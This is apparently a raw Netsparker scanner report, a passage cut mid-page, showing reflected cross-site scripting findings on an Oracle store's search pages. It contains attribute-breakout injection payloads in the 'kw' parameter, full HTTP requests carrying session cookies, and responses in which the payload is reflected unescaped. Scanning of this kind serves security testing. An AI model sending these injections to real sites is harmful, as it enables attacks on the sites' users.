class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10062:1298367:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""><net sparker=netsparker(0x001018)>"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10062:1298367:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><table summary='' border=0 width="100%" cellspacing="0" cellpadding="1" > <tr> <td valign="top" width="15%" >&nbsp;</td> <td valign="top" width="70%" class="pageTitle"> <!-------------------- bug 7559727 use error message box--------------------> <table width="100%" border="0" cellspacing="0" cellpadding="4" summary=""> <TR> <TD> </TD> </TR> </table> <!-------------------- end bug 7559727 --------------------> <..
- /OA_HTML/ibeCSrdSrchAdvForm.jsp

/OA_HTML/ibeCSrdSrchAdvForm.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US&cg=-200&kw=%27%2..

Parameters

Parameter Type Value
sitex GET 10145:1298447:US
cg GET -200
kw GET '" ns= alert(0x000D22)

Request

GET /OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US&cg=-200&kw=%27%22%20ns=%20netsparker(0x000D22)%20 HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=9d0f43924f53b390c4b040e721fedc1e9052d064dd3ad633159527940c2affde.e34QbhaLa3mKbi0La3mQaNePax4Oe0; GSI_pses=ZGBD0B0F08743B653105AC74815E04D68A7B5EDF6A0AC32F398B7784FF411688FC9957A3668953D9441530176A551E2D1C; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=9VLueJID5TYmH1RzJSPnSPqpOR
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=9d0f43924f53b390c4b040e721fedc1e9052d064dd3ad633159527940c2affde.e34QbhaLa3mKbi0La3mQaNePax4Oe0; path=/OA_HTML; secure
Content-Length: 5659
Date: Sun, 11 Sep 2011 17:59:44 GMT
































<!-- $Header: ibeCSrdSrchAdvForm.jsp 120.3 2008/01/14 07:11:39 skotikal ship $ $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Advanced Search </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x000D22)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><p><center> <table summary='' width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> <tr> <td width="15%">&nbsp;</td> <td valign="top" width="70%"> <!-- $Header: ibeCSrdSrchAdvCmp.jsp 120.2.12010000.2 2009/02/03 08:33:24 scnagara ship $ --> <FORM name="advancedSearch" method=POST ACTION="ibeCSrdSrchResults.jsp"> <table summary='' width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> <tr> <td class=pageTitle >Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte...
- /OA_HTML/ibeCSrdSrchResults.jsp

/OA_HTML/ibeCSrdSrchResults.jsp

https://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp

Parameters

Parameter Type Value
kw POST '" ns= alert(0x001207)
bo POST default
nkw POST 3
ds POST 0
dr POST 50
st POST rkw
event POST 3

Request

POST /OA_HTML/ibeCSrdSrchResults.jsp HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: oraclestore.oracle.com
Cookie: JSESSIONID=678f6f8b73639a4e18ace92937fca0f7dd2afb5ab19bb0e09c4987756bc0335d.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZG909DA4E5D337E2533E09A10F3C8841EBD724D27AE005D0E046B51484A94A380582BAD88394C2E5A5218CEE82BCF84C64; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=j8Rnjln8bRrxqwuVKOYUAaal5p
Content-Length: 84
Expect: 100-continue
Accept-Encoding: gzip, deflate

kw=%27%22%20ns=%20netsparker(0x001207)%20&bo=default&nkw=3&ds=0&dr=50&st=rkw&event=3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=678f6f8b73639a4e18ace92937fca0f7dd2afb5ab19bb0e09c4987756bc0335d.e34QbhaLa3mKbi0La3mQaNePax4Ne0; path=/OA_HTML; secure
Content-Length: 5194
Date: Sun, 11 Sep 2011 18:03:03 GMT
































<!-- $Header: ibeCSrdSrchResults.jsp 120.16.12010000.3 2009/03/30 05:20:55 scnagara ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!--fixed bug 3854430 -- browser title derived from fnd_message instead of hardcoding --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Search Results </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td 